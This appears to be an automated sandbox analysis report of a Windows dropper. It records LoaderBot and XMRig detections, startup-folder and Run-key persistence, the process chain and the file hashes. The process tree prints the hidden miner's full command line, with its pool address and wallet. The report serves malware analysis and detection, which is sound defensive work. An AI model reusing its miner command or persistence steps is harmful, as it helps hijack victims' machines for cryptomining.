Analysis
-
max time kernel
124s -
max time network
301s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
27-05-2023 22:24
Static task
static1
Behavioral task
behavioral1
Sample
f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb.exe
Resource
win10-20230220-en
General
-
Target
f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb.exe
-
Size
2.1MB
-
MD5
79931719ae9c21e1d8c5f1a419e85f71
-
SHA1
d4c5bdc3d4a0f2e9ca5f6e9407b837dea75c8edd
-
SHA256
f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb
-
SHA512
e71ee3950f025f4aa0727a52b4493d9c57671bd73b3ae9309983229071c1812d2b9801067a0e80fa04dddc5e13e3dfdb223f07c75ab7757f296f79db7bad986f
-
SSDEEP
49152:ABRj0wlUtbZqxNwv6MitufUjzmTL7oG34n0FBhlT:at0wlUxgGqzULEGgi
Malware Config
Signatures
-
LoaderBot executable 3 IoCs
resource yara_rule behavioral2/files/0x000a00000001af2a-139.dat loaderbot behavioral2/files/0x000a00000001af2a-140.dat loaderbot behavioral2/memory/3036-141-0x00000000007C0000-0x0000000000BBE000-memory.dmp loaderbot -
XMRig Miner payload 30 IoCs
resource yara_rule behavioral2/memory/3376-151-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-153-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-155-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-156-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-159-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-162-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-163-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-164-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-165-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-166-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-167-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-168-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-169-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-170-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-171-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-172-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-173-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-174-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-175-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-176-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-177-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-178-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-179-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-180-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-181-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-182-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-183-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-184-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-185-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/3376-186-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url fesa.exe -
Executes dropped EXE 3 IoCs
pid Process 3844 work.exe 3036 fesa.exe 3376 Driver.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\fesa.exe" fesa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe 3036 fesa.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3036 fesa.exe Token: SeLockMemoryPrivilege 3376 Driver.exe Token: SeLockMemoryPrivilege 3376 Driver.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 404 wrote to memory of 3960 404 f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb.exe 66 PID 404 wrote to memory of 3960 404 f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb.exe 66 PID 404 wrote to memory of 3960 404 f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb.exe 66 PID 3960 wrote to memory of 3844 3960 cmd.exe 69 PID 3960 wrote to memory of 3844 3960 cmd.exe 69 PID 3960 wrote to memory of 3844 3960 cmd.exe 69 PID 3844 wrote to memory of 3036 3844 work.exe 70 PID 3844 wrote to memory of 3036 3844 work.exe 70 PID 3844 wrote to memory of 3036 3844 work.exe 70 PID 3036 wrote to memory of 3376 3036 fesa.exe 72 PID 3036 wrote to memory of 3376 3036 fesa.exe 72
Processes
-
C:\Users\Admin\AppData\Local\Temp\f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb.exe"C:\Users\Admin\AppData\Local\Temp\f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exework.exe -priverdD3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\fesa.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\fesa.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 25⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3376
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
35B
MD5ff59d999beb970447667695ce3273f75
SHA1316fa09f467ba90ac34a054daf2e92e6e2854ff8
SHA256065d2b17ad499587dc9de7ee9ecda4938b45da1df388bc72e6627dff220f64d2
SHA512d5ac72cb065a3cd3cb118a69a2f356314eeed24dcb4880751e1a3683895e66cedc62607967e29f77a0c27adf1c9fe0efd86e804f693f0a63a5b51b0bf0056b5d
-
Filesize
1.9MB
MD5636373768d83d47a8469e19e7c364cba
SHA19a0af5c6a5af766c45d2d318727843f4909bf35f
SHA2560af038a51b667ec95cac7ebd4a4c04b5011c451e211c34cb1c918891e955268a
SHA5121f8d81b4463a0533d1e264cd946f5de8c7e5c584c9ac2ff63f23e3bd7c235abdc3f4a547059e71d362540bfbcedfb35bbcd558d83baa1daa675be059d34140f6
-
Filesize
1.9MB
MD5636373768d83d47a8469e19e7c364cba
SHA19a0af5c6a5af766c45d2d318727843f4909bf35f
SHA2560af038a51b667ec95cac7ebd4a4c04b5011c451e211c34cb1c918891e955268a
SHA5121f8d81b4463a0533d1e264cd946f5de8c7e5c584c9ac2ff63f23e3bd7c235abdc3f4a547059e71d362540bfbcedfb35bbcd558d83baa1daa675be059d34140f6
-
Filesize
4.0MB
MD533b4baef7b0a6ad57a7d30af324c4efd
SHA1b169a559615a8448d7ed7da56d36a6850d2092e2
SHA2563a48d4a5106dd9ba74e5fccfe58bf65581ee894d7f3ca1b15e6680fc912cd150
SHA512739759d92a9e48e41b0366104ac9edf469cd8f323bbef0b507e3351cf081869ed069b88927fa70329d655012702385a74686df921a62dba95d7ec138a1e46690
-
Filesize
4.0MB
MD533b4baef7b0a6ad57a7d30af324c4efd
SHA1b169a559615a8448d7ed7da56d36a6850d2092e2
SHA2563a48d4a5106dd9ba74e5fccfe58bf65581ee894d7f3ca1b15e6680fc912cd150
SHA512739759d92a9e48e41b0366104ac9edf469cd8f323bbef0b507e3351cf081869ed069b88927fa70329d655012702385a74686df921a62dba95d7ec138a1e46690
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322